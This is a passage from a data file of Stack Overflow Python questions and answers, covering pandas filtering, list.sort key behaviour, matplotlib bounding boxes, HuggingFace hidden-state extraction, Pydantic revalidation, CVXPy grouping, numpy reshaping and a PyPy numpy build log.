606.630573 2 9 0 8 2024-06-21 06:22:46 22966 607.476367 15 13 3 12 2024-06-21 06:22:50 22970 605.333781 1 1 1 13 2024-06-21 06:22:50 22971 604.333781 15 1 1 works in principle but leaves all rows meeting the last criterion. I want to stop the query after the first finding of all meeting criteria. Is there a way without undertaking a groupby of ['s01[m]']? The last way I tried is with loc. 
This would also reset the index but results in the same row content: df_sub = df_GPS.loc[(df_GPS['__UTCs__'] >= 0) & (df_GPS['s01[m]'] <= 16)] time __UTCs__ Altitude s01[m] s5.5[m] s10[m] 0 2024-06-21 06:22:38 22958 605.968389 1 2 1 1 2024-06-21 06:22:39 22959 606.009398 3 0 1 2 2024-06-21 06:22:40 22960 605.630573 1 2 0 3 2024-06-21 06:22:41 22961 605.476367 3 3 0 4 2024-06-21 06:22:42 22962 605.322161 2 1 1 5 2024-06-21 06:22:43 22963 605.268389 4 1 0 6 2024-06-21 06:22:44 22964 605.559398 1 3 1 7 2024-06-21 06:22:45 22965 606.630573 2 9 0 8 2024-06-21 06:22:46 22966 607.476367 15 13 3 12 2024-06-21 06:22:50 22970 605.333781 1 1 1 13 2024-06-21 06:22:50 22971 604.333781 15 1 1 How may I finish the query? with a while-loop? | You can use cummin to compute your second condition: df_GPS[df_GPS['__UTCs__'].ge(22960) & df_GPS['s01[m]'].lt(16).cummin()] Output: time __UTCs__ Altitude s01[m] s5.5[m] s10[m] 2 2024-06-21 06:22:40 22960 605.630573 1 2 0 3 2024-06-21 06:22:41 22961 605.476367 3 3 0 4 2024-06-21 06:22:42 22962 605.322161 2 1 1 5 2024-06-21 06:22:43 22963 605.268389 4 1 0 6 2024-06-21 06:22:44 22964 605.559398 1 3 1 7 2024-06-21 06:22:45 22965 606.630573 2 9 0 8 2024-06-21 06:22:46 22966 607.476367 15 13 3 Intermediates: __UTCs__ s01[m] __UTCs__ >= 22960 s01[m] < 16 (s01[m] < 16).cummin() & 0 22958 1 False True True False 1 22959 3 False True True False 2 22960 1 True True True True 3 22961 3 True True True True 4 22962 2 True True True True 5 22963 4 True True True True 6 22964 1 True True True True 7 22965 2 True True True True 8 22966 15 True True True True 9 22967 23 True False False False 10 22968 20 True False False False 11 22969 18 True False False False 12 22970 1 True True False False 13 22971 15 True True False False A potentially more robust approach if you have many conditions and want the first stretch of all True: m = df_GPS['__UTCs__'].ge(22960) & df_GPS['s01[m]'].lt(16) m2 = m.ne(m.shift(fill_value=m.iloc[0])).cumsum().eq(1) & m out = df_GPS[m2] Intermediates: __UTCs__ s01[m] m shift ne cumsum eq(1) & m 0 22958 1 False False False 0 False False 1 22959 3 False False False 0 False False 2 22960 1 True False True 1 True True 3 22961 3 True True False 1 True True 4 22962 2 True True False 1 True True 5 22963 4 True True False 1 True True 6 22964 1 True True False 1 True True 7 22965 2 True True False 1 True True 8 22966 15 True True False 1 True True 9 22967 23 False True True 2 False False 10 22968 20 False False False 2 False False 11 22969 18 False False False 2 False False 12 22970 1 True False True 3 False False 13 22971 15 True True False 3 False False | 2 | 2 |
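The cummin idea wrapped into a small helper, with the index reset the question mentions (a sketch reusing df_GPS from above):

def take_until_first_violation(df, start_mask, keep_mask):
    # keep rows satisfying start_mask, but only until keep_mask turns False for the first time
    return df[start_mask & keep_mask.cummin()]

df_sub = take_until_first_violation(
    df_GPS,
    df_GPS["__UTCs__"].ge(22960),
    df_GPS["s01[m]"].lt(16),
).reset_index(drop=True)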
79,549,626 | 2025-4-2 | https://stackoverflow.com/questions/79549626/why-does-sort-with-key-function-not-do-anything-while-sorted-is-working | I have a list of integers with duplicates and I need to sort it by the number of these duplicates. For example: input: n = [2, 4, 1, 2] output: n = [4, 1, 2, 2] I wrote some code and noticed, that sort() does not change the list. But if I try to use sorted() with the same key argument, then it works just fine. What is the reason behind this? My code: nums = [2, 4, 1, 2] nums.sort(key = lambda x: nums.count(x)) print(nums) Can it be connected to sort() method using in-place algorithm? | Unlike sorted, the list.sort method sorts a list in-place, during which time the list is in an interim state where there is no integrity to its internal data structure for the other methods to read from. Since a key function for the sort method is called during a sort, your calling the count method of the same list in the key function does not actually return the count of a given item as you expect, which you can see with a wrapper function: def count(x): n = nums.count(x) print(n) return n nums = [2, 4, 1, 2] nums.sort(key=count) the above outputs: 0 0 0 0 which explains why the list remains in the same order since the key for each item turns out to be the same value of 0 and since the sorting algorithm used is a stable one. The documentation of list.sort also notes: CPython implementation detail: While a list is being sorted, the effect of attempting to mutate, or even inspect, the list is undefined. The C implementation of Python makes the list appear empty for the duration, and raises ValueError if it can detect that the list has been mutated during a sort. So CPython's implementation makes the list appear empty during a sort, which explains why list.count returns 0 when called from a key function. | 4 | 5 |
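Two variants that do work, since neither one reads nums while it is being sorted in place (the Counter version also avoids the quadratic cost of calling count once per element):

from collections import Counter

nums = [2, 4, 1, 2]

print(sorted(nums, key=nums.count))   # [4, 1, 2, 2]; sorted() builds a new list, nums stays readable

counts = Counter(nums)                # precompute the counts once
nums.sort(key=counts.__getitem__)     # the key now reads counts, not the list being sorted
print(nums)                           # [4, 1, 2, 2]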
79,547,850 | 2025-4-1 | https://stackoverflow.com/questions/79547850/why-is-the-bounding-box-not-aligned-to-the-square | import numpy as np import matplotlib.pyplot as plt from matplotlib.patches import Rectangle def generate_square_image(size, square_size, noise_level=0.0): """ Generates an image with a white square in the center. Args: size (int): The size of the image (size x size). square_size (int): The size of the square. noise_level (float): Standard deviation of Gaussian noise. Returns: numpy.ndarray: The image as a numpy array. numpy.ndarray: The mask. tuple: Bounding box (x_min, y_min, width, height). """ # create mask mask = np.zeros((size, size)) start = (size - square_size) // 2 end = start + square_size mask[start:end, start:end] = 1 # create bounding box bbox = (start, start, square_size, square_size) # create noisy image img = mask.copy() if noise_level > 0: noise = np.random.normal(0, noise_level, img.shape) img = np.clip(img + noise, 0, 1) return img, mask, bbox # Example usage: size = 100 square_size = 40 img, mask, bbox = generate_square_image(size, square_size, noise_level=0.1) # Plot the image fig, ax = plt.subplots(1, 3, figsize=(15, 5)) ax[0].imshow(img, cmap='gray') ax[0].set_title('Generated Image') ax[1].imshow(mask, cmap='gray') ax[1].set_title('Mask') # Display the bounding box overlayed on the image ax[2].imshow(img, cmap='gray') x, y, width, height = bbox # The key fix: in matplotlib, the Rectangle coordinates start at the bottom-left corner # But imshow displays arrays with the origin at the top-left corner rect = Rectangle((x, y), width, height, linewidth=2, edgecolor='r', facecolor='none') ax[2].add_patch(rect) ax[2].set_title('Image with Bounding Box') # Ensure origin is set to 'upper' to match imshow defaults for a in ax: a.set_ylim([size, 0]) # Reverse y-axis to match array indexing plt.tight_layout() plt.show() Question: What is the right code to align the box properly? It seems to be the most straight forward approach to create one? As you can see, I have already tried prompting this to work, but even that fix (which seems to be the one thing to explore here, which is the difference in coordinate systems) does not seem to work either. | Fixes: 1. Subtract 0.5 from x and y in Rectangle().Matplotlib positions pixels at the center of grid cells, but imshow() assumes pixel edges align exactly with grid lines. Adjusting by -0.5 shifts the bounding box to align properly. 2. origin='upper' ensures consistency with NumPy's top-left origin. 3. Hiding axis ticks makes visualization clearer. The full corrected code is provided below: import numpy as np import matplotlib.pyplot as plt from matplotlib.patches import Rectangle def generate_square_image(size, square_size, noise_level=0.0): """ Generates an image with a white square in the center. Args: size (int): The size of the image (size x size). square_size (int): The size of the square. noise_level (float): Standard deviation of Gaussian noise. Returns: numpy.ndarray: The image as a numpy array. numpy.ndarray: The mask. tuple: Bounding box (x_min, y_min, width, height). 
""" # Create mask mask = np.zeros((size, size)) start = (size - square_size) // 2 end = start + square_size mask[start:end, start:end] = 1 # Create bounding box (x_min, y_min, width, height) bbox = (start, start, square_size, square_size) # Create noisy image img = mask.copy() if noise_level > 0: noise = np.random.normal(0, noise_level, img.shape) img = np.clip(img + noise, 0, 1) return img, mask, bbox # Example usage: size = 100 square_size = 40 img, mask, bbox = generate_square_image(size, square_size, noise_level=0.1) # Plot the image fig, ax = plt.subplots(1, 3, figsize=(15, 5)) # Display the generated image ax[0].imshow(img, cmap='gray', origin='upper') ax[0].set_title('Generated Image') # Display the mask ax[1].imshow(mask, cmap='gray', origin='upper') ax[1].set_title('Mask') # Display the image with bounding box ax[2].imshow(img, cmap='gray', origin='upper') x, y, width, height = bbox # Adjust bounding box position to match imshow's top-left origin rect = Rectangle((x - 0.5, y - 0.5), width, height, linewidth=2, edgecolor='r', facecolor='none') ax[2].add_patch(rect) ax[2].set_title('Image with Bounding Box') # Ensure correct axis orientation for a in ax: a.set_xticks([]) a.set_yticks([]) plt.tight_layout() plt.show() OutPut: | 3 | 3 |
79,549,110 | 2025-4-1 | https://stackoverflow.com/questions/79549110/huggingface-tokenizer-str-object-has-no-attribute-size | I am trying to extract the hidden states of a transformer model: from transformers import AutoModel import torch from transformers import AutoTokenizer model_ckpt = "distilbert-base-uncased" device = torch.device("cuda" if torch.cuda.is_available() else "cpu") tokenizer = AutoTokenizer.from_pretrained(model_ckpt) model = AutoModel.from_pretrained(model_ckpt).to(device) from datasets import load_dataset emotions = load_dataset("emotion", ignore_verifications=True) # tokenize data def tokenize(batch): return tokenizer(batch["text"], padding=True, truncation=True) emotions_encoded = emotions.map(tokenize, batched=True, batch_size=None) def extract_hidden_states(batch): inputs = {k:v.to(device) for k,v in batch.items() if k in tokenizer.model_input_names} with torch.no_grad(): last_hidden_state = model(*inputs).last_hidden_state return{"hidden_state": last_hidden_state[:,0].cpu().numpy()} # convert input_ids and attention_mask columns to "torch" format emotions_encoded.set_format("torch", columns=["input_ids", "attention_mask", "label"]) # extract hidden states emotions_hidden = emotions_encoded.map(extract_hidden_states, batched=True) However, on running the last line I get the error 'str' object has no attribute 'size' I've tried deprecating the transformers package but that didn't fix it. Some posts online indicate it may have to do with the transformer package will return a dictionary by default, but I don't know how to work around that. Full error: AttributeError Traceback (most recent call last) Cell In[8], line 5 2 emotions_encoded.set_format("torch", columns=["input_ids", "attention_mask", "label"]) 4 # extract hidden states ----> 5 emotions_hidden = emotions_encoded.map(extract_hidden_states, batched=True) File ~\Anaconda3\envs\ml\lib\site-packages\datasets\dataset_dict.py:851, in DatasetDict.map(self, function, with_indices, with_rank, input_columns, batched, batch_size, drop_last_batch, remove_columns, keep_in_memory, load_from_cache_file, cache_file_names, writer_batch_size, features, disable_nullable, fn_kwargs, num_proc, desc) 848 if cache_file_names is None: 849 cache_file_names = {k: None for k in self} 850 return DatasetDict( --> 851 { 852 k: dataset.map( 853 function=function, 854 with_indices=with_indices, 855 with_rank=with_rank, 856 input_columns=input_columns, 857 batched=batched, 858 batch_size=batch_size, 859 drop_last_batch=drop_last_batch, 860 remove_columns=remove_columns, 861 keep_in_memory=keep_in_memory, 862 load_from_cache_file=load_from_cache_file, 863 cache_file_name=cache_file_names[k], 864 writer_batch_size=writer_batch_size, 865 features=features, 866 disable_nullable=disable_nullable, 867 fn_kwargs=fn_kwargs, 868 num_proc=num_proc, 869 desc=desc, 870 ) 871 for k, dataset in self.items() 872 } 873 ) File ~\Anaconda3\envs\ml\lib\site-packages\datasets\dataset_dict.py:852, in <dictcomp>(.0) 848 if cache_file_names is None: 849 cache_file_names = {k: None for k in self} 850 return DatasetDict( 851 { --> 852 k: dataset.map( 853 function=function, 854 with_indices=with_indices, 855 with_rank=with_rank, 856 input_columns=input_columns, 857 batched=batched, 858 batch_size=batch_size, 859 drop_last_batch=drop_last_batch, 860 remove_columns=remove_columns, 861 keep_in_memory=keep_in_memory, 862 load_from_cache_file=load_from_cache_file, 863 cache_file_name=cache_file_names[k], 864 writer_batch_size=writer_batch_size, 865 features=features, 866 
disable_nullable=disable_nullable, 867 fn_kwargs=fn_kwargs, 868 num_proc=num_proc, 869 desc=desc, 870 ) 871 for k, dataset in self.items() 872 } 873 ) File ~\Anaconda3\envs\ml\lib\site-packages\datasets\arrow_dataset.py:578, in transmit_tasks.<locals>.wrapper(*args, **kwargs) 576 self: "Dataset" = kwargs.pop("self") 577 # apply actual function --> 578 out: Union["Dataset", "DatasetDict"] = func(self, *args, **kwargs) 579 datasets: List["Dataset"] = list(out.values()) if isinstance(out, dict) else [out] 580 for dataset in datasets: 581 # Remove task templates if a column mapping of the template is no longer valid File ~\Anaconda3\envs\ml\lib\site-packages\datasets\arrow_dataset.py:543, in transmit_format.<locals>.wrapper(*args, **kwargs) 536 self_format = { 537 "type": self._format_type, 538 "format_kwargs": self._format_kwargs, 539 "columns": self._format_columns, 540 "output_all_columns": self._output_all_columns, 541 } 542 # apply actual function --> 543 out: Union["Dataset", "DatasetDict"] = func(self, *args, **kwargs) 544 datasets: List["Dataset"] = list(out.values()) if isinstance(out, dict) else [out] 545 # re-apply format to the output File ~\Anaconda3\envs\ml\lib\site-packages\datasets\arrow_dataset.py:3073, in Dataset.map(self, function, with_indices, with_rank, input_columns, batched, batch_size, drop_last_batch, remove_columns, keep_in_memory, load_from_cache_file, cache_file_name, writer_batch_size, features, disable_nullable, fn_kwargs, num_proc, suffix_template, new_fingerprint, desc) 3065 if transformed_dataset is None: 3066 with logging.tqdm( 3067 disable=not logging.is_progress_bar_enabled(), 3068 unit=" examples", (...) 3071 desc=desc or "Map", 3072 ) as pbar: -> 3073 for rank, done, content in Dataset._map_single(**dataset_kwargs): 3074 if done: 3075 shards_done += 1 File ~\Anaconda3\envs\ml\lib\site-packages\datasets\arrow_dataset.py:3449, in Dataset._map_single(shard, function, with_indices, with_rank, input_columns, batched, batch_size, drop_last_batch, remove_columns, keep_in_memory, cache_file_name, writer_batch_size, features, disable_nullable, fn_kwargs, new_fingerprint, rank, offset) 3445 indices = list( 3446 range(*(slice(i, i + batch_size).indices(shard.num_rows))) 3447 ) # Something simpler? 3448 try: -> 3449 batch = apply_function_on_filtered_inputs( 3450 batch, 3451 indices, 3452 check_same_num_examples=len(shard.list_indexes()) > 0, 3453 offset=offset, 3454 ) 3455 except NumExamplesMismatchError: 3456 raise DatasetTransformationNotAllowedError( 3457 "Using `.map` in batched mode on a dataset with attached indexes is allowed only if it doesn't create or remove existing examples. You can first run `.drop_index() to remove your index and then re-add it." 
3458 ) from None File ~\Anaconda3\envs\ml\lib\site-packages\datasets\arrow_dataset.py:3330, in Dataset._map_single.<locals>.apply_function_on_filtered_inputs(pa_inputs, indices, check_same_num_examples, offset) 3328 if with_rank: 3329 additional_args += (rank,) -> 3330 processed_inputs = function(*fn_args, *additional_args, **fn_kwargs) 3331 if isinstance(processed_inputs, LazyDict): 3332 processed_inputs = { 3333 k: v for k, v in processed_inputs.data.items() if k not in processed_inputs.keys_to_format 3334 } Cell In[7], line 6, in extract_hidden_states(batch) 3 inputs = {k:v.to(device) for k,v in batch.items() 4 if k in tokenizer.model_input_names} 5 with torch.no_grad(): ----> 6 last_hidden_state = model(*inputs).last_hidden_state 7 return{"hidden_state": last_hidden_state[:,0].cpu().numpy()} File ~\Anaconda3\envs\ml\lib\site-packages\torch\nn\modules\module.py:1511, in Module._wrapped_call_impl(self, *args, **kwargs) 1509 return self._compiled_call_impl(*args, **kwargs) # type: ignore[misc] 1510 else: -> 1511 return self._call_impl(*args, **kwargs) File ~\Anaconda3\envs\ml\lib\site-packages\torch\nn\modules\module.py:1520, in Module._call_impl(self, *args, **kwargs) 1515 # If we don't have any hooks, we want to skip the rest of the logic in 1516 # this function, and just call forward. 1517 if not (self._backward_hooks or self._backward_pre_hooks or self._forward_hooks or self._forward_pre_hooks 1518 or _global_backward_pre_hooks or _global_backward_hooks 1519 or _global_forward_hooks or _global_forward_pre_hooks): -> 1520 return forward_call(*args, **kwargs) 1522 try: 1523 result = None File ~\Anaconda3\envs\ml\lib\site-packages\transformers\models\distilbert\modeling_distilbert.py:593, in DistilBertModel.forward(self, input_ids, attention_mask, head_mask, inputs_embeds, output_attentions, output_hidden_states, return_dict) 591 elif input_ids is not None: 592 self.warn_if_padding_and_no_attention_mask(input_ids, attention_mask) --> 593 input_shape = input_ids.size() 594 elif inputs_embeds is not None: 595 input_shape = inputs_embeds.size()[:-1] AttributeError: 'str' object has no attribute 'size' | The issue is happening when you're filtering the dictionary, extract_hidden_states in your extract_hidden_states() function. This dictionary includes keys like 'text' (which contains strings), the function may mistakenly try to .to(device) on a string, which I'm guessing is causing the error here. You can modify your function this way: def extract_hidden_states(batch): inputs = {k: v for k, v in batch.items() if k in tokenizer.model_input_names} # Ensure all inputs are tensors before sending them to device inputs = {k: v.clone().detach().to(device) for k, v in inputs.items()} with torch.no_grad(): outputs = model(**inputs) # Unpacking inputs properly last_hidden_state = outputs.last_hidden_state return {"hidden_state": last_hidden_state[:, 0].cpu().numpy()} | 1 | 2 |
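The decisive change, matching the answer's "Unpacking inputs properly" comment, is passing the dict as keyword arguments. With *inputs the dict's keys (strings such as "input_ids") are passed positionally, which is why DistilBERT ends up calling .size() on a str:

with torch.no_grad():
    last_hidden_state = model(**inputs).last_hidden_state   # ** unpacks to input_ids=..., attention_mask=...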
79,549,000 | 2025-4-1 | https://stackoverflow.com/questions/79549000/pydantic-object-self-validation | I am trying to understand the way validation works in pydantic. I create a class and three objects: import pydantic class TestClass(pydantic.BaseModel): id: int = 'text' name: str obj0 = TestClass(id=1, name="test") obj1 = TestClass(name="test") obj2 = TestClass.model_construct(id=2) One may see that first object is totally valid, second semivalid, and third one definitive not, that's why I omit the validation using model_construct(). Now I want to validate the objects, as pydantic suggests: vobj0= TestClass.model_validate(obj0, strict=True) vobj1= TestClass.model_validate(obj1, strict=True) vobj2= TestClass.model_validate(obj2, strict=True) The problem is that NONE of the lines rises ValidationError! I found a clumsy way around it, namely transforming objects to dicts: vobj0= TestClass.model_validate(obj0.model_dump(), strict=True) vobj1= TestClass.model_validate(obj1.model_dump(), strict=True) vobj2= TestClass.model_validate(obj2.model_dump(), strict=True) This code does raise the ValidationError in the second and third lines. I cannot understand why does it behave in such a funny way? I expected something like obj.validate_me(), but can't find anything like this. So, my question: if I create an object without validation (with model_construct()), what is the right way to do the validation afterwards? | By default Pydantic does not re-validate instances, because it assumes they have been validated. This is configurable, the docs is here In your test program, all you need is to update the TestClass definition: class TestClass(pydantic.BaseModel, revalidate_instances='always'): ... (There is also another related option you might find interesting: validate_assignment) Field defaults are also not validated by default. (See the validate_default parameter in Field). Otherwise you would not be able to write: id: int = 'text' | 1 | 2 |
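A minimal sketch of the answer's suggestion, assuming Pydantic v2: with revalidate_instances="always" set on the model, model_validate now raises for an instance that was built with model_construct.

import pydantic

class TestClass(pydantic.BaseModel, revalidate_instances="always"):
    id: int = 0
    name: str

obj = TestClass.model_construct(id=2)   # skips validation, 'name' is never set
try:
    TestClass.model_validate(obj)       # the instance is now re-validated
except pydantic.ValidationError as exc:
    print(exc)                          # reports the missing 'name' field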
79,548,243 | 2025-4-1 | https://stackoverflow.com/questions/79548243/how-to-do-a-groupby-on-a-cxvpy-variable-is-there-a-way-using-pandas | I would like to define a loss function for the CVXPy optimization that minimizes differences from the reference grouped target: import cvxpy as cp import pandas as pd # toy example for demonstration purpose target = pd.DataFrame(data={'a': ['X', 'X', 'Y', 'Z', 'Z'], 'b': [1]*5}) w = cp.Variable(target.shape[0]) beta = cp.Variable(target.shape[0]) def loss_func(w, beta): x = pd.DataFrame(data={'a': target['a'], 'b': w @ beta}).groupby('a')['b'].sum() y = target.groupby('a')['b'].sum() return cp.norm2(x - y)**2 # <<<<<<<<<<<<<< ValueError: setting an array element with a sequence. but this gives me the following error ValueError: setting an array element with a sequence. What would be the way to cover this use-case using CVXPy? | Based on my understanding, your code calculates the sum of weighted values (w @ beta) grouped by the unique values in column "a". However, since Pandas cannot handle CVXPY variables, this approach results in errors. The hstack method, on the other hand, uses native CVXPY functions like cp.sum() and cp.hstack(), making it fully compatible and error-free while giving the same result. Therefore, it’s better to use the hstack approach. for example: import cvxpy as cp import pandas as pd # toy example for demonstration purpose target = pd.DataFrame(data={"a": ["X", "X", "Y", "Z", "Z"], "b": [1] * 5}) w = cp.Variable(target.shape[0]) beta = cp.Variable(target.shape[0]) def loss_func2(w, beta): x = cp.hstack([ cp.sum(w[target["a"] == group] * beta[target["a"] == group]) for group in target["a"].unique() ]) y = target.groupby("a")["b"].sum().values return cp.norm2(x - y) ** 2 | 1 | 1 |
79,548,754 | 2025-4-1 | https://stackoverflow.com/questions/79548754/reshape-4d-array-to-2d | I have the array import numpy as np a1 = [["a1", "a2"], ["a3", "a4"], ["a5", "a6"], ["a7", "a8"]] b1 = [["b1", "b2"], ["b3", "b4"], ["b5", "b6"], ["b7","b8"]] c1 = [["c1", "c2"], ["c3", "c4"], ["c5", "c6"], ["c7","c8"]] arr = np.array([a1, b1, c1]) #arr.shape #(3, 4, 2) Which I want to reshape to a 2D array: ["a1","b1","c1"], ["a2","b2","c2"], ..., ["a8","b8","c8"] I've tried different things like: # arr.reshape((8,3)) # array([['a1', 'a2', 'a3'], # ['a4', 'a5', 'a6'], # ['a7', 'a8', 'b1'], # ['b2', 'b3', 'b4'], # ['b5', 'b6', 'b7'], # ['b8', 'c1', 'c2'], # ['c3', 'c4', 'c5'], # ['c6', 'c7', 'c8']]) #arr.T.reshape(8,3) # array([['a1', 'b1', 'c1'], # ['a3', 'b3', 'c3'], # ['a5', 'b5', 'c5'], # ['a7', 'b7', 'c7'], # ['a2', 'b2', 'c2'], # ['a4', 'b4', 'c4'], # ['a6', 'b6', 'c6'], # ['a8', 'b8', 'c8']] # arr.ravel().reshape(8,3) # array([['a1', 'a2', 'a3'], # ['a4', 'a5', 'a6'], # ['a7', 'a8', 'b1'], # ['b2', 'b3', 'b4'], # ['b5', 'b6', 'b7'], # ['b8', 'c1', 'c2'], # ['c3', 'c4', 'c5'], # ['c6', 'c7', 'c8']]) | What you want is to stack the arrays such that the final 2D shape is (8, 3), where each row contains the same index from each original array. So the key is to use np.array(arr).transpose(1, 2, 0).reshape(-1, 3). Code Example: import numpy as np a1 = [["a1", "a2"], ["a3", "a4"], ["a5", "a6"], ["a7", "a8"]] b1 = [["b1", "b2"], ["b3", "b4"], ["b5", "b6"], ["b7","b8"]] c1 = [["c1", "c2"], ["c3", "c4"], ["c5", "c6"], ["c7","c8"]] arr = np.array([a1, b1, c1]) # shape: (3, 4, 2) result = arr.transpose(1, 2, 0).reshape(-1, 3) print(result) | 2 | 2 |
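A quick self-check of the accepted transpose/reshape approach against the ordering requested in the question (first row a1/b1/c1, last row a8/b8/c8):

import numpy as np

a1 = [["a1", "a2"], ["a3", "a4"], ["a5", "a6"], ["a7", "a8"]]
b1 = [["b1", "b2"], ["b3", "b4"], ["b5", "b6"], ["b7", "b8"]]
c1 = [["c1", "c2"], ["c3", "c4"], ["c5", "c6"], ["c7", "c8"]]

arr = np.array([a1, b1, c1])                    # shape (3, 4, 2)
result = arr.transpose(1, 2, 0).reshape(-1, 3)  # shape (8, 3)

assert result[0].tolist() == ["a1", "b1", "c1"]
assert result[-1].tolist() == ["a8", "b8", "c8"]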
79,548,492 | 2025-4-1 | https://stackoverflow.com/questions/79548492/cant-install-numpy-with-pypy-7-3-19 | I'm trying to install numpy (2.2.3) with PyPy 7.3.19 (Python 3.11.11). I'm using PyPy in a .venv folder. While the venv is active, I've tried running these commands: python -m pip install numpy pip install numpy pypy -m pip install numpy First windows flagged the install as a virus: This was fixed by allowing the threat. After this was fixed I got this error (error has been truncated to fit stack overflow): [402/530] Compiling C object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath_legacy_array_method.c.obj [403/530] Compiling C object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath_extobj.c.obj [404/530] Compiling C++ object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_npysort_heapsort.cpp.obj [405/530] Compiling C object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath_reduction.c.obj [406/530] Compiling C object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath_override.c.obj [407/530] Compiling C++ object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath_dispatching.cpp.obj [408/530] Compiling C object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath_ufunc_type_resolution.c.obj [409/530] Compiling C++ object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath_clip.cpp.obj [410/530] Compiling C object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath_wrapping_array_method.c.obj [411/530] Compiling C object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath__scaled_float_dtype.c.obj [412/530] Compiling C++ object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath_special_integer_comparisons.cpp.obj [413/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_SSE42.a.p\\_simd_inc.h' [414/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_SSE42.a.p\\_simd_data.inc' [415/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_AVX2.a.p\\_simd_data.inc' [416/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_SSE42.a.p\\_simd.dispatch.c' [417/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_AVX2.a.p\\_simd_inc.h' [418/530] Compiling C object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/meson-generated_lowlevel_strided_loops.c.obj [419/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_FMA3.a.p\\_simd_inc.h' [420/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_AVX2.a.p\\_simd.dispatch.c' [421/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_FMA3.a.p\\_simd_data.inc' [422/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_FMA3.a.p\\_simd.dispatch.c' [423/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_AVX512F.a.p\\_simd_inc.h' [424/530] Compiling C object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath_ufunc_object.c.obj [425/530] Compiling C++ object numpy/_core/libx86_simd_argsort.dispatch.h_AVX2.a.p/src_npysort_x86_simd_argsort.dispatch.cpp.obj [426/530] Linking static target numpy/_core/libx86_simd_argsort.dispatch.h_AVX2.a [427/530] Compiling C++ object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_npysort_quicksort.cpp.obj [428/530] Compiling C++ object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_npysort_selection.cpp.obj [429/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_AVX512F.a.p\\_simd_data.inc' [430/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_AVX512_SKX.a.p\\_simd_inc.h' [431/530] Compiling 
C++ object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath_stringdtype_ufuncs.cpp.obj [432/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_AVX512_SKX.a.p\\_simd_data.inc' [433/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_AVX512F.a.p\\_simd.dispatch.c' [434/530] Generating 'numpy\\_core\\lib_simd.dispatch.h_AVX512_SKX.a.p\\_simd.dispatch.c' [435/530] Compiling C object numpy/_core/_simd.pypy311-pp73-win_amd64.pyd.p/src__simd__simd.c.obj [436/530] Compiling C object numpy/linalg/lapack_lite.pypy311-pp73-win_amd64.pyd.p/lapack_litemodule.c.obj [437/530] Compiling C object numpy/_core/_simd.pypy311-pp73-win_amd64.pyd.p/src_common_npy_cpu_features.c.obj [438/530] Compiling C object numpy/linalg/lapack_lite.pypy311-pp73-win_amd64.pyd.p/lapack_lite_python_xerbla.c.obj [439/530] Compiling C object numpy/linalg/lapack_lite.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c.c.obj [440/530] Compiling C object numpy/_core/libloops_autovec.dispatch.h_AVX2.a.p/meson-generated_loops_autovec.dispatch.c.obj [441/530] Linking static target numpy/_core/libloops_autovec.dispatch.h_AVX2.a [442/530] Compiling C++ object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath_string_ufuncs.cpp.obj [443/530] Linking static target numpy/_core/lib_multiarray_umath_mtargets.a [444/530] Compiling C object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_umath_umathmodule.c.obj [445/530] Compiling C++ object numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd.p/src_npysort_timsort.cpp.obj [446/530] Compiling C object numpy/linalg/lapack_lite.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_config.c.obj [447/530] Linking target numpy/_core/_multiarray_umath.pypy311-pp73-win_amd64.pyd [448/530] Compiling C object numpy/linalg/lapack_lite.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c_lapack.c.obj [449/530] Compiling C object numpy/linalg/_umath_linalg.pypy311-pp73-win_amd64.pyd.p/lapack_lite_python_xerbla.c.obj [450/530] Compiling C object numpy/linalg/_umath_linalg.pypy311-pp73-win_amd64.pyd.p/lapack_lite_f2c.c.obj [451/530] Compiling C object numpy/_core/lib_simd.dispatch.h_SSE42.a.p/meson-generated__simd.dispatch.c.obj [452/530] Linking static target numpy/_core/lib_simd.dispatch.h_SSE42.a [453/530] Compiling C object numpy/_core/lib_simd.dispatch.h_baseline.a.p/meson-generated__simd.dispatch.c.obj [454/530] Linking static target numpy/_core/lib_simd.dispatch.h_baseline.a [455/530] Compiling C object numpy/_core/lib_simd.dispatch.h_AVX512_SKX.a.p/meson-generated__simd.dispatch.c.obj [456/530] Linking static target numpy/_core/lib_simd.dispatch.h_AVX512_SKX.a [457/530] Compiling C object numpy/_core/lib_simd.dispatch.h_AVX2.a.p/meson-generated__simd.dispatch.c.obj [458/530] Linking static target numpy/_core/lib_simd.dispatch.h_AVX2.a [459/530] Compiling C object 